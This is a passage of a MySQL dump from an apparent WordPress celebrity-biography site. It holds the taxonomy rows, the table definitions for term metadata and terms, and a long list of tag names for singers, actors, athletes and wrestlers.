post_tag','',0,1),(287,287,'post_tag','',0,1),(288,288,'post_tag','',0,1),(289,289,'post_tag','',0,1),(290,290,'post_tag','',0,1),(291,291,'post_tag','',0,1),(292,292,'post_tag','',0,1),(293,293,'post_tag','',0,1),(294,294,'post_tag','',0,1),(296,296,'post_tag','',0,1),(297,297,'post_tag','',0,1),(298,298,'post_tag','',0,1),(299,299,'post_tag','',0,2),(300,300,'post_tag','',0,1),(301,301,'post_tag','',0,1),(302,302,'post_tag','',0,1),(303,303,'post_tag','',0,1),(304,304,'post_tag','',0,1),(305,305,'post_tag','',0,1),(306,306,'post_tag','',0,1),(307,307,'post_tag','',0,1),(308,308,'post_tag','',0,1),(309,309,'post_tag','',0,1),(310,310,'post_tag','',0,1),(312,312,'post_tag','',0,1),(313,313,'post_tag','',0,1),(314,314,'post_tag','',0,1),(315,315,'post_tag','',0,1),(316,316,'post_tag','',0,1),(317,317,'post_tag','',0,1),(318,318,'post_tag','',0,1),(319,319,'post_tag','',0,2),(320,320,'post_tag','',0,1),(321,321,'post_tag','',0,1),(322,322,'post_tag','',0,1),(323,323,'post_tag','',0,1),(324,324,'post_tag','',0,1),(326,326,'post_tag','',0,1),(327,327,'post_tag','',0,1),(328,328,'post_tag','',0,1),(329,329,'post_tag','',0,1),(330,330,'post_tag','',0,1),(331,331,'post_tag','',0,1),(332,332,'post_tag','',0,1),(333,333,'post_tag','',0,1),(334,334,'post_tag','',0,1),(335,335,'post_tag','',0,1),(336,336,'post_tag','',0,1),(337,337,'post_tag','',0,1),(338,338,'post_tag','',0,1),(339,339,'post_tag','',0,1),(340,340,'post_tag','',0,1),(341,341,'post_tag','',0,1),(342,342,'post_tag','',0,1),(343,343,'post_tag','',0,1),(344,344,'post_tag','',0,1),(345,345,'post_tag','',0,1),(346,346,'post_tag','',0,1),(347,347,'post_tag','',0,1),(348,348,'post_tag','',0,1),(349,349,'post_tag','',0,1),(351,351,'post_tag','',0,1),(352,352,'post_tag','',0,1),(353,353,'post_tag','',0,1),(354,354,'post_tag','',0,0),(355,355,'post_tag','',0,1),(357,357,'post_tag','',0,1),(358,358,'post_tag','',0,1),(359,359,'post_tag','',0,1),(360,360,'post_tag','',0,1),(361,361,'post_tag','',0,1),(362,362,'post_tag','',0,1),(363,363,'post_tag','',0,1),(364,364,'post_tag','',0,1),(365,365,'post_tag','',0,1),(366,366,'post_tag','',0,1),(367,367,'post_tag','',0,1),(368,368,'post_tag','',0,1),(369,369,'post_tag','',0,1),(370,370,'post_tag','',0,1),(371,371,'post_tag','',0,1),(372,372,'post_tag','',0,1),(373,373,'post_tag','',0,1),(374,374,'post_tag','',0,1),(375,375,'post_tag','',0,1),(376,376,'post_tag','',0,1),(377,377,'post_tag','',0,1),(378,378,'nav_menu','',0,5),(380,380,'post_tag','',0,1),(381,381,'post_tag','',0,1),(382,382,'post_tag','',0,1),(383,383,'post_tag','',0,1),(384,384,'post_tag','',0,1),(385,385,'post_tag','',0,1),(386,386,'post_tag','',0,4),(389,389,'post_tag','',0,1),(390,390,'post_tag','',0,1),(391,391,'post_tag','',0,1),(392,392,'post_tag','',0,1),(393,393,'post_tag','',0,1),(394,394,'post_tag','',0,1),(395,395,'post_tag','',0,1),(396,396,'post_tag','',0,1),(397,397,'post_tag','',0,7),(398,398,'post_tag','',0,7),(399,399,'post_tag','',0,1),(400,400,'post_tag','',0,1),(401,401,'post_tag','',0,2),(402,402,'post_tag','',0,3),(403,403,'post_tag','',0,1),(405,405,'post_tag','',0,1),(406,406,'post_tag','',0,2),(407,407,'post_tag','',0,3),(408,408,'post_tag','',0,1),(409,409,'post_tag','',0,1),(410,410,'post_tag','',0,1),(411,411,'post_tag','',0,1),(412,412,'post_tag','',0,1),(413,413,'post_tag','',0,8),(414,414,'post_tag','',0,3),(415,415,'post_tag','',0,1),(416,416,'post_tag','',0,1),(417,417,'post_tag','',0,1),(418,418,'post_tag','',0,1),(419,419,'post_tag','',0,2),(420,420,'post_tag','',0,1),(421,421,'post_tag','',0,1),(422,422,'post_tag','',0,1),(423,423,'post_tag','',0,1),(424,424,'post_tag','',0,1),(425,425,'post_tag','',0,1),(426,426,'post_tag','',0,1),(427,427,'post_tag','',0,1),(428,428,'post_tag','',0,1),(429,429,'post_tag','',0,1),(430,430,'post_tag','',0,4),(432,432,'post_tag','',0,4),(433,433,'post_tag','',0,1),(434,434,'post_tag','',0,1),(435,435,'post_tag','',0,4),(436,436,'post_tag','',0,1),(437,437,'post_tag','',0,1),(438,438,'post_tag','',0,2),(439,439,'post_tag','',0,1),(440,440,'post_tag','',0,1),(441,441,'post_tag','',0,1),(442,442,'post_tag','',0,1),(443,443,'post_tag','',0,3),(444,444,'post_tag','',0,1),(445,445,'post_tag','',0,1),(446,446,'post_tag','',0,1),(447,447,'post_tag','',0,1),(448,448,'post_tag','',0,1),(449,449,'post_tag','',0,1),(450,450,'post_tag','',0,1),(451,451,'post_tag','',0,3),(452,452,'post_tag','',0,1),(453,453,'post_tag','',0,1),(454,454,'post_tag','',0,1),(455,455,'post_tag','',0,1),(456,456,'post_tag','',0,1),(457,457,'post_tag','',0,1),(458,458,'post_tag','',0,2),(459,459,'post_tag','',0,1),(460,460,'post_tag','',0,3),(461,461,'post_tag','',0,5),(462,462,'post_tag','',0,1),(463,463,'post_tag','',0,1),(464,464,'post_tag','',0,1),(465,465,'post_tag','',0,2),(466,466,'post_tag','',0,2),(467,467,'post_tag','',0,1),(468,468,'post_tag','',0,1),(469,469,'post_tag','',0,1),(470,470,'post_tag','',0,1),(471,471,'post_tag','',0,1),(472,472,'post_tag','',0,1),(473,473,'post_tag','',0,1),(474,474,'post_tag','',0,1),(475,475,'post_tag','',0,1),(477,477,'post_tag','',0,1),(478,478,'post_tag','',0,1),(479,479,'post_tag','',0,1),(480,480,'post_tag','',0,1),(481,481,'post_tag','',0,1),(482,482,'post_tag','',0,0),(483,483,'post_tag','',0,0),(484,484,'post_tag','',0,0),(485,485,'post_tag','',0,0),(486,486,'post_tag','',0,0),(487,487,'post_tag','',0,1),(488,488,'post_tag','',0,1),(489,489,'post_tag','',0,1),(490,490,'post_tag','',0,1),(491,491,'post_tag','',0,1),(492,492,'post_tag','',0,1),(493,493,'post_tag','',0,1),(494,494,'post_tag','',0,0),(495,495,'post_tag','',0,0),(496,496,'post_tag','',0,1),(497,497,'post_tag','',0,1),(498,498,'post_tag','',0,1),(499,499,'post_tag','',0,1),(500,500,'post_tag','',0,1),(501,501,'post_tag','',0,1),(502,502,'post_tag','',0,1),(503,503,'post_tag','',0,1),(504,504,'post_tag','',0,9),(505,505,'post_tag','',0,9),(506,506,'post_tag','',0,11),(507,507,'post_tag','',0,1),(508,508,'post_tag','',0,1),(509,509,'post_tag','',0,1),(510,510,'post_tag','',0,1),(511,511,'post_tag','',0,1),(512,512,'post_tag','',0,1),(513,513,'post_tag','',0,1),(514,514,'post_tag','',0,1),(515,515,'post_tag','',0,1),(516,516,'post_tag','',0,1),(517,517,'category','',0,35),(518,518,'category','',517,14),(519,519,'category','',517,31),(520,520,'category','',0,2),(521,521,'category','',0,6),(522,522,'category','',521,14),(523,523,'category','',521,10),(524,524,'category','',0,9),(525,525,'category','',524,1),(526,526,'category','',524,6),(527,527,'category','',524,1),(528,528,'category','',524,8),(529,529,'category','',524,28),(530,530,'category','',524,1),(531,531,'category','',0,3),(532,532,'category','',531,2),(533,533,'category','',531,2),(534,534,'category','',531,1),(535,535,'category','',531,0),(536,536,'category','',531,3),(537,537,'category','',531,4),(538,538,'category','',531,2),(539,539,'category','',531,0),(540,540,'category','',531,0),(541,541,'category','',531,0),(542,542,'category','',0,7),(543,543,'category','',0,0),(544,544,'category','',0,5),(545,545,'category','',544,7),(546,546,'category','',544,4),(547,547,'category','',544,0),(548,548,'category','',544,1),(549,549,'category','',543,0),(550,550,'category','',543,0),(551,551,'category','',543,0),(552,552,'category','',543,23),(553,553,'category','',543,20),(554,554,'category','',543,23),(555,555,'category','',543,19),(556,556,'category','',543,20),(557,557,'category','',543,24),(558,558,'category','',543,2),(559,559,'category','',543,2),(560,560,'category','',543,0),(561,561,'category','',0,0),(562,562,'category','',561,0),(563,563,'category','',561,0),(564,564,'category','',561,0),(565,565,'category','',561,7),(566,566,'category','',561,21),(567,567,'category','',561,22),(568,568,'category','',561,23),(569,569,'category','',561,16),(570,570,'category','',561,18),(571,571,'category','',561,25),(572,572,'category','',561,0),(573,573,'category','',561,0),(574,574,'category','',529,13),(575,575,'category','',529,6),(576,576,'category','',529,1),(577,577,'category','',529,0),(578,578,'category','',529,1),(579,579,'category','',529,5),(580,580,'category','',529,0),(581,581,'post_tag','',0,1),(582,582,'post_tag','',0,1),(583,583,'post_tag','',0,1),(584,584,'post_tag','',0,1),(585,585,'post_tag','',0,1),(586,586,'post_tag','',0,1),(587,587,'post_tag','',0,1),(588,588,'post_tag','',0,0),(589,589,'post_tag','',0,0),(590,590,'post_tag','',0,1),(591,591,'post_tag','',0,0),(592,592,'post_tag','',0,0),(593,593,'post_tag','',0,1),(594,594,'post_tag','',0,1),(595,595,'post_tag','',0,1),(596,596,'post_tag','',0,1),(597,597,'post_tag','',0,1),(598,598,'post_tag','',0,1),(599,599,'post_tag','',0,1),(600,600,'post_tag','',0,1),(601,601,'post_tag','',0,1),(602,602,'post_tag','',0,1),(603,603,'post_tag','',0,1),(604,604,'post_tag','',0,0),(605,605,'category','',0,6),(606,606,'post_tag','',0,1),(607,607,'post_tag','',0,1),(608,608,'post_tag','',0,1),(609,609,'post_tag','',0,1),(610,610,'post_tag','',0,1),(611,611,'post_tag','',0,1),(612,612,'post_tag','',0,1),(613,613,'post_tag','',0,1),(614,614,'post_tag','',0,8),(615,615,'post_tag','',0,1),(616,616,'post_tag','',0,1),(617,617,'post_tag','',0,1),(618,618,'post_tag','',0,1),(619,619,'post_tag','',0,1),(620,620,'post_tag','',0,1),(621,621,'post_tag','',0,1),(622,622,'post_tag','',0,1),(623,623,'post_tag','',0,1),(624,624,'post_tag','',0,0),(625,625,'post_tag','',0,0),(626,626,'post_tag','',0,1),(627,627,'post_tag','',0,0),(628,628,'post_tag','',0,0),(629,629,'post_tag','',0,0),(630,630,'post_tag','',0,0),(631,631,'post_tag','',0,1),(632,632,'post_tag','',0,0),(633,633,'post_tag','',0,0),(634,634,'post_tag','',0,0),(635,635,'post_tag','',0,0),(636,636,'post_tag','',0,1),(637,637,'post_tag','',0,1),(638,638,'post_tag','',0,1),(639,639,'post_tag','',0,1),(640,640,'post_tag','',0,0),(641,641,'post_tag','',0,0),(642,642,'post_tag','',0,0),(643,643,'category','',544,2),(644,644,'category','',0,2),(645,645,'category','',544,3),(646,646,'category','',0,1),(647,647,'post_tag','',0,0),(648,648,'post_tag','',0,0),(649,649,'post_tag','',0,1),(650,650,'post_tag','',0,0),(651,651,'post_tag','',0,0),(652,652,'post_tag','',0,0),(653,653,'post_tag','',0,0),(654,654,'category','',0,1),(655,655,'category','',0,1),(656,656,'post_tag','',0,1),(657,657,'post_tag','',0,1),(658,658,'post_tag','',0,1),(659,659,'post_tag','',0,1),(660,660,'post_tag','',0,1),(661,661,'post_tag','',0,1),(662,662,'post_tag','',0,1),(663,663,'post_tag','',0,1),(664,664,'post_tag','',0,1),(665,665,'post_tag','',0,1),(666,666,'post_tag','',0,1),(667,667,'post_tag','',0,1),(668,668,'post_tag','',0,1),(669,669,'post_tag','',0,1),(670,670,'post_tag','',0,1),(671,671,'post_tag','',0,1),(672,672,'post_tag','',0,1),(673,673,'post_tag','',0,1),(674,674,'post_tag','',0,1),(675,675,'post_tag','',0,1),(676,676,'post_tag','',0,1),(677,677,'post_tag','',0,1),(678,678,'post_tag','',0,1),(679,679,'post_tag','',0,1),(680,680,'post_tag','',0,1),(681,681,'post_tag','',0,1),(682,682,'post_tag','',0,1),(683,683,'post_tag','',0,1),(684,684,'post_tag','',0,1),(685,685,'post_tag','',0,1),(686,686,'post_tag','',0,1),(687,687,'post_tag','',0,0),(688,688,'post_tag','',0,0),(689,689,'post_tag','',0,1),(690,690,'post_tag','',0,1),(691,691,'post_tag','',0,0),(692,692,'post_tag','',0,1),(693,693,'post_tag','',0,0),(694,694,'post_tag','',0,0),(695,695,'post_tag','',0,1),(696,696,'post_tag','',0,0),(697,697,'post_tag','',0,0),(698,698,'post_tag','',0,0),(699,699,'post_tag','',0,0),(700,700,'post_tag','',0,1),(701,701,'post_tag','',0,1),(702,702,'post_tag','',0,0),(703,703,'post_tag','',0,0),(704,704,'post_tag','',0,0),(705,705,'post_tag','',0,2),(706,706,'post_tag','',0,0),(707,707,'post_tag','',0,0),(708,708,'post_tag','',0,0),(709,709,'post_tag','',0,0),(710,710,'post_tag','',0,0),(711,711,'post_tag','',0,0),(712,712,'post_tag','',0,2),(713,713,'post_tag','',0,0),(714,714,'post_tag','',0,0),(715,715,'post_tag','',0,0),(716,716,'post_tag','',0,0),(717,717,'post_tag','',0,1),(718,718,'post_tag','',0,1),(719,719,'post_tag','',0,0),(720,720,'post_tag','',0,1),(721,721,'post_tag','',0,1),(722,722,'post_tag','',0,1),(723,723,'post_tag','',0,1),(724,724,'post_tag','',0,1),(725,725,'post_tag','',0,1),(726,726,'post_tag','',0,1),(727,727,'post_tag','',0,1),(728,728,'post_tag','',0,1),(729,729,'post_tag','',0,1),(730,730,'post_tag','',0,1),(731,731,'post_tag','',0,1),(732,732,'post_tag','',0,1),(733,733,'post_tag','',0,1),(734,734,'post_tag','',0,1),(735,735,'post_tag','',0,1),(736,736,'post_tag','',0,1),(737,737,'post_tag','',0,1),(738,738,'post_tag','',0,1),(739,739,'post_tag','',0,1),(740,740,'post_tag','',0,1),(741,741,'post_tag','',0,1),(742,742,'post_tag','',0,1),(743,743,'post_tag','',0,1),(744,744,'post_tag','',0,1),(745,745,'post_tag','',0,1),(746,746,'post_tag','',0,1),(747,747,'post_tag','',0,1),(748,748,'post_tag','',0,1),(749,749,'post_tag','',0,1),(750,750,'post_tag','',0,1),(751,751,'post_tag','',0,1),(752,752,'post_tag','',0,1),(753,753,'post_tag','',0,1),(754,754,'post_tag','',0,1),(755,755,'post_tag','',0,1),(756,756,'post_tag','',0,1),(757,757,'post_tag','',0,1),(758,758,'post_tag','',0,1),(759,759,'post_tag','',0,1),(760,760,'post_tag','',0,1),(761,761,'post_tag','',0,1),(762,762,'post_tag','',0,1),(763,763,'post_tag','',0,1),(764,764,'post_tag','',0,1),(765,765,'post_tag','',0,1),(766,766,'post_tag','',0,1),(767,767,'post_tag','',0,1),(768,768,'post_tag','',0,1),(769,769,'post_tag','',0,1),(770,770,'post_tag','',0,0),(771,771,'post_tag','',0,0),(772,772,'post_tag','',0,0),(773,773,'post_tag','',0,1),(774,774,'post_tag','',0,1),(775,775,'post_tag','',0,1),(776,776,'post_tag','',0,3),(777,777,'post_tag','',0,1),(778,778,'post_tag','',0,1),(779,779,'post_tag','',0,1),(780,780,'post_tag','',0,1),(781,781,'post_tag','',0,1),(782,782,'post_tag','',0,1),(783,783,'post_tag','',0,1),(784,784,'post_tag','',0,1),(785,785,'post_tag','',0,1),(786,786,'post_tag','',0,1),(787,787,'post_tag','',0,1),(788,788,'post_tag','',0,1),(789,789,'post_tag','',0,1),(790,790,'post_tag','',0,1),(791,791,'post_tag','',0,1),(792,792,'post_tag','',0,1),(793,793,'post_tag','',0,1),(794,794,'post_tag','',0,1),(795,795,'post_tag','',0,1),(796,796,'post_tag','',0,1),(797,797,'post_tag','',0,1),(798,798,'post_tag','',0,1),(799,799,'post_tag','',0,1),(800,800,'post_tag','',0,1),(801,801,'post_tag','',0,1),(802,802,'post_tag','',0,1),(803,803,'post_tag','',0,1),(804,804,'post_tag','',0,1),(805,805,'post_tag','',0,1),(806,806,'post_tag','',0,1),(807,807,'post_tag','',0,0),(808,808,'post_tag','',0,0),(809,809,'post_tag','',0,1),(810,810,'post_tag','',0,1),(811,811,'post_tag','',0,1),(812,812,'post_tag','',0,1),(813,813,'post_tag','',0,1),(814,814,'post_tag','',0,1),(815,815,'post_tag','',0,1),(816,816,'post_tag','',0,1),(817,817,'post_tag','',0,1),(818,818,'post_tag','',0,1),(819,819,'post_tag','',0,1),(820,820,'post_tag','',0,1),(821,821,'post_tag','',0,1),(822,822,'post_tag','',0,1),(823,823,'post_tag','',0,1),(824,824,'post_tag','',0,1),(825,825,'post_tag','',0,1),(826,826,'post_tag','',0,1),(827,827,'post_tag','',0,1),(828,828,'post_tag','',0,1),(829,829,'post_tag','',0,1),(830,830,'post_tag','',0,1),(831,831,'post_tag','',0,1),(832,832,'post_tag','',0,1),(833,833,'post_tag','',0,1),(834,834,'post_tag','',0,1),(835,835,'post_tag','',0,1),(836,836,'post_tag','',0,1),(837,837,'post_tag','',0,1),(838,838,'post_tag','',0,1),(839,839,'post_tag','',0,1),(840,840,'post_tag','',0,1),(841,841,'post_tag','',0,1),(842,842,'post_tag','',0,1),(843,843,'post_tag','',0,1),(844,844,'post_tag','',0,1),(845,845,'post_tag','',0,1),(846,846,'post_tag','',0,1),(847,847,'post_tag','',0,1),(848,848,'post_tag','',0,1),(849,849,'post_tag','',0,1),(850,850,'post_tag','',0,1),(851,851,'post_tag','',0,1),(852,852,'post_tag','',0,1),(853,853,'post_tag','',0,1),(854,854,'post_tag','',0,1),(855,855,'post_tag','',0,1),(856,856,'post_tag','',0,1),(857,857,'post_tag','',0,1),(858,858,'post_tag','',0,1),(859,859,'post_tag','',0,0),(860,860,'post_tag','',0,0),(861,861,'post_tag','',0,0),(862,862,'post_tag','',0,0),(863,863,'post_tag','',0,0),(864,864,'post_tag','',0,0),(865,865,'post_tag','',0,2),(866,866,'post_tag','',0,1),(867,867,'post_tag','',0,1),(868,868,'post_tag','',0,1),(869,869,'post_tag','',0,1),(870,870,'post_tag','',0,1),(871,871,'post_tag','',0,1),(872,872,'post_tag','',0,0),(873,873,'post_tag','',0,0),(874,874,'post_tag','',0,0),(875,875,'post_tag','',0,0),(876,876,'post_tag','',0,0),(877,877,'post_tag','',0,0),(878,878,'post_tag','',0,0),(879,879,'post_tag','',0,1),(880,880,'post_tag','',0,1),(881,881,'post_tag','',0,1),(882,882,'post_tag','',0,1),(883,883,'post_tag','',0,1),(884,884,'post_tag','',0,1),(885,885,'post_tag','',0,1),(886,886,'post_tag','',0,1),(887,887,'post_tag','',0,1),(888,888,'post_tag','',0,1),(889,889,'post_tag','',0,0),(890,890,'post_tag','',0,0),(891,891,'post_tag','',0,0),(892,892,'post_tag','',0,0),(893,893,'post_tag','',0,1),(894,894,'post_tag','',0,1),(895,895,'post_tag','',0,1),(896,896,'post_tag','',0,1),(897,897,'post_tag','',0,1),(898,898,'post_tag','',0,1),(899,899,'post_tag','',0,1),(900,900,'post_tag','',0,1),(901,901,'post_tag','',0,1),(902,902,'post_tag','',0,1),(903,903,'post_tag','',0,1),(904,904,'post_tag','',0,1),(905,905,'post_tag','',0,1),(906,906,'post_tag','',0,1),(907,907,'post_tag','',0,1),(908,908,'post_tag','',0,1),(909,909,'post_tag','',0,1),(910,910,'post_tag','',0,1);
/*!40000 ALTER TABLE `wp_term_taxonomy` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_termmeta`
--
DROP TABLE IF EXISTS `wp_termmeta`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_termmeta` (
`meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
`meta_key` varchar(255) DEFAULT NULL,
`meta_value` longtext DEFAULT NULL,
PRIMARY KEY (`meta_id`),
KEY `term_id` (`term_id`),
KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_termmeta`
--
LOCK TABLES `wp_termmeta` WRITE;
/*!40000 ALTER TABLE `wp_termmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_termmeta` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_terms`
--
DROP TABLE IF EXISTS `wp_terms`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_terms` (
`term_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`name` varchar(200) NOT NULL DEFAULT '',
`slug` varchar(200) NOT NULL DEFAULT '',
`term_group` bigint(10) NOT NULL DEFAULT 0,
PRIMARY KEY (`term_id`),
KEY `slug` (`slug`(191)),
KEY `name` (`name`(191))
) ENGINE=InnoDB AUTO_INCREMENT=911 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_terms`
--
LOCK TABLES `wp_terms` WRITE;
/*!40000 ALTER TABLE `wp_terms` DISABLE KEYS */;
INSERT INTO `wp_terms` VALUES (1,'Uncategorized','uncategorized',0),(2,'Tim McGraw','tim-mcgraw',0),(3,'Country Music','country-music',0),(4,'Country Legend Tim McGraw','country-legend-tim-mcgraw',0),(5,'McGraw','mcgraw',0),(6,'Indian Outlaw','indian-outlaw',0),(9,'Dwayne \"The Rock\" Johnson','dwayne-the-rock-johnson',0),(10,'Dwayne Johnson','dwayne-johnson',0),(11,'The Rock','the-rock',0),(14,'Country Music Singer','country-music-singer',0),(15,'Randy Travis','randy-travis',0),(16,'Randy Travis History','randy-travis-history',0),(18,'Pop Singer Chris Brown','pop-singer-chris-brown',0),(19,'Chris Brown','chris-brown',0),(20,'Pop Music','pop-music',0),(21,'George Clooney','george-clooney',0),(22,'Movie Actor','movie-actor',0),(23,'George Clooney Humanitarian Work','george-clooney-humanitarian-work',0),(27,'John Constantine Unitas','john-constantine-unitas',0),(28,'American Football','american-football',0),(29,'Jhonny Unitas','jhonny-unitas',0),(30,'John Unitas','john-unitas',0),(31,'NFL','nfl',0),(32,'Spanish singer','spanish-singer',0),(33,'Enrique Iglesias','enrique-iglesias',0),(34,'Header','header',0),(37,'TV comedian','tv-comedian',0),(38,'TV actor','tv-actor',0),(39,'Ricky Gervais','ricky-gervais',0),(40,'Reading Berkshire famous people','reading-berkshire-famous-people',0),(41,'english comedian','english-comedian',0),(42,'Channer 4 stars','channer-4-stars',0),(43,'Famous pop singer','famous-pop-singer',0),(44,'Ariana Grande','ariana-grande',0),(45,'Ariana Grande career','ariana-grande-career',0),(46,'“Baby I”','baby-i',0),(47,'“Right There”','right-there',0),(49,'Gary Busey','gary-busey',0),(50,'Texas famous actors','texas-famous-actors',0),(51,'Angels Hard as They Come cast','angels-hard-as-they-come-cast',0),(52,'Mr. Joshua','mr-joshua',0),(53,'Lethal Weapon','lethal-weapon',0),(54,'Barry Goosey','barry-goosey',0),(56,'Mike Tyson','mike-tyson',0),(57,'famous boxer','famous-boxer',0),(58,'World Boxing Council heavyweight Championship','world-boxing-council-heavyweight-championship',0),(59,'The Hangover cast','the-hangover-cast',0),(60,'Mike Tyson Mysteries','mike-tyson-mysteries',0),(63,'Miranda Cosgrove','miranda-cosgrove',0),(64,'Drake & Josh','drake-josh',0),(65,'iCarly','icarly',0),(66,'What’s New','whats-new',0),(67,'Scooby Doo cast','scooby-doo-cast',0),(68,'MIranda Cosgrove career','miranda-cosgrove-career',0),(69,'Crowded','crowded',0),(70,'George Strait','george-strait',0),(71,'Academy of Country Music’s “Artist of the Decade”','academy-of-country-musics-artist-of-the-decade',0),(72,'famous country musician','famous-country-musician',0),(73,'King of Country','king-of-country',0),(74,'Billboard Hot Country Songs','billboard-hot-country-songs',0),(75,'Ray Lewis','ray-lewis',0),(76,'wrestling stars','wrestling-stars',0),(77,'NFL Draft','nfl-draft',0),(78,'Super Bowl','super-bowl',0),(79,'famous Christians','famous-christians',0),(80,'Miami Hurricanes football team','miami-hurricanes-football-team',0),(81,'Humanitarians','humanitarians',0),(83,'Casey Kasem','casey-kasem',0),(84,'important radio host','important-radio-host',0),(85,'famous radio host','famous-radio-host',0),(86,'KRLA','krla',0),(87,'Shaggy\'s voice','shaggys-voice',0),(88,'Jerry Seinfeld','jerry-seinfeld',0),(89,'Stand-up Comedian','stand-up-comedian',0),(90,'Greatest Stand-up Comedian','greatest-stand-up-comedian',0),(91,'Seinfeld','seinfeld',0),(93,'Jay Leno','jay-leno',0),(94,'important TV host','important-tv-host',0),(95,'Leading with My Chin','leading-with-my-chin',0),(96,'rich people','rich-people',0),(97,'TV stars','tv-stars',0),(98,'Dianna Argon','dianna-argon',0),(99,'Glee cast','glee-cast',0),(100,'Quinn Fabray','quinn-fabray',0),(101,'A fuchsia elephant','a-fuchsia-elephant',0),(102,'Jack Nicholson','jack-nicholson',0),(103,'Jack Nicholson bio','jack-nicholson-bio',0),(104,'Jack Nicholson Oscar win','jack-nicholson-oscar-win',0),(105,'Movies Celebrities','movies-celebrities',0),(106,'As good as it gets','as-good-as-it-gets',0),(108,'Famous wrestler','famous-wrestler',0),(109,'John Cena','john-cena',0),(110,'WWE Tag Team Champions of SmackDow','wwe-tag-team-champions-of-smackdow',0),(111,'Elizabeth Huberdeau','elizabeth-huberdeau',0),(112,'Make-A-Wish Foundation','make-a-wish-foundation',0),(113,'American professional wrestling','american-professional-wrestling',0),(114,'Kelly Clarkson','kelly-clarkson',0),(115,'America\'s best voice','americas-best-voice',0),(116,'American Idol celebrities','american-idol-celebrities',0),(117,'Brandon Blackstone','brandon-blackstone',0),(119,'Paul McCartney','paul-mccartney',0),(120,'The Beatles','the-beatles',0),(121,'Beatles','beatles',0),(122,'Rock stars','rock-stars',0),(123,'Greatest bands ever','greatest-bands-ever',0),(124,'greatest musicians ever','greatest-musicians-ever',0),(125,'Linda McCartney','linda-mccartney',0),(126,'Nancy Shevell','nancy-shevell',0),(127,'Paula Abdul','paula-abdul',0),(128,'American Idol Judges','american-idol-judges',0),(129,'Nasty','nasty',0),(132,'Meryl Streep','meryl-streep',0),(133,'Iron Lady','iron-lady',0),(134,'Mamma Mia','mamma-mia',0),(135,'Mery Streep bio','mery-streep-bio',0),(136,'Meryl Streep family','meryl-streep-family',0),(137,'Randy Jackson','randy-jackson',0),(138,'Randall Matthew Jackson','randall-matthew-jackson',0),(139,'Urban AC and Mainstream','urban-ac-and-mainstream',0),(142,'Lionel Messi','lionel-messi',0),(143,'Best soccer player','best-soccer-player',0),(144,'best soccer team','best-soccer-team',0),(145,'argentinian soccer player','argentinian-soccer-player',0),(146,'Argentina','argentina',0),(147,'FC Barcelona','fc-barcelona',0),(148,'Kanye West','kanye-west',0),(149,'Best rapper','best-rapper',0),(150,'Grammy Award','grammy-award',0),(151,'hip-hop musician','hip-hop-musician',0),(152,'Andrea Pirlo','andrea-pirlo',0),(153,'professional soccer player','professional-soccer-player',0),(154,'best midfielder','best-midfielder',0),(155,'Johnny Depp','johnny-depp',0),(156,'Johnny Depp\'s first job','johnny-depps-first-job',0),(157,'21 Jump Street','21-jump-street',0),(158,'Amber Heard','amber-heard',0),(159,'Cher','cher',0),(160,'Cher\'s life','chers-life',0),(161,'Cher bio','cher-bio',0),(162,'all times gratest pop singer','all-times-gratest-pop-singer',0),(163,'gay icon','gay-icon',0),(164,'Sonny and Cher','sonny-and-cher',0),(166,'Kate Upton','kate-upton',0),(167,'famous model','famous-model',0),(168,'top model','top-model',0),(170,'Mr. T','mr-t',0),(171,'professional wrestler','professional-wrestler',0),(172,'motivational speaker','motivational-speaker',0),(173,'Rocky III','rocky-iii',0),(174,'WrestleMania','wrestlemania',0),(175,'Dr. house','dr-house',0),(176,'Hugh Laurie','hugh-laurie',0),(177,'James Hugh Calum Laurie','james-hugh-calum-laurie',0),(178,'Greatest actors','greatest-actors',0),(179,'101 Dalmatians','101-dalmatians',0),(180,'British comedian','british-comedian',0),(181,'Santana Garrett','santana-garrett',0),(182,'female professional wrestler','female-professional-wrestler',0),(183,'CCW Wrestling','ccw-wrestling',0),(184,'Santana G','santana-g',0),(185,'Jim Nabors','jim-nabors',0),(186,'Andy Griffith','andy-griffith',0),(187,'tv celebrities','tv-celebrities',0),(188,'The Rookies','the-rookies',0),(189,'television man','television-man',0),(190,'Cougar Town','cougar-town',0),(191,'Courteney Cox','courteney-cox',0),(192,'friends actors','friends-actors',0),(193,'Monica Geller','monica-geller',0),(194,'tupak shakur','tupak-shakur',0),(195,'2pac shakur','2pac-shakur',0),(196,'best rapper ever','best-rapper-ever',0),(197,'tupac amaru shakur','tupac-amaru-shakur',0),(198,'Barry Manilow','barry-manilow',0),(199,'New York College of Music','new-york-college-of-music',0),(200,'Julliard famous students','julliard-famous-students',0),(201,'Mandy song','mandy-song',0),(202,'Ian McKellen','ian-mckellen',0),(203,'A Man for All Seasons','a-man-for-all-seasons',0),(204,'Ian McKellen\'s life','ian-mckellens-life',0),(205,'The Hobbit cast','the-hobbit-cast',0),(206,'LGBT famous actor','lgbt-famous-actor',0),(207,'Chefs','chefs',0),(208,'Jamie Oliver','jamie-oliver',0),(209,'famous chefs','famous-chefs',0),(210,'TED Prize winner','ted-prize-winner',0),(211,'best chef','best-chef',0),(212,'best restaurant','best-restaurant',0),(213,'Jamie\'s Italian','jamies-italian',0),(215,'Jep Robertson','jep-robertson',0),(216,'Duckmen DVD series','duckmen-dvd-series',0),(217,'Duckman','duckman',0),(219,'La Toya Jackson','la-toya-jackson',0),(220,'Best R&B singer','best-rb-singer',0),(221,'R&B','rb',0),(222,'Rythm and blues artist','rythm-and-blues-artist',0),(223,'Celebrity Big Brother','celebrity-big-brother',0),(225,'world best singer','world-best-singer',0),(226,'best funk singer','best-funk-singer',0),(227,'great musicians','great-musicians',0),(228,'Lenny 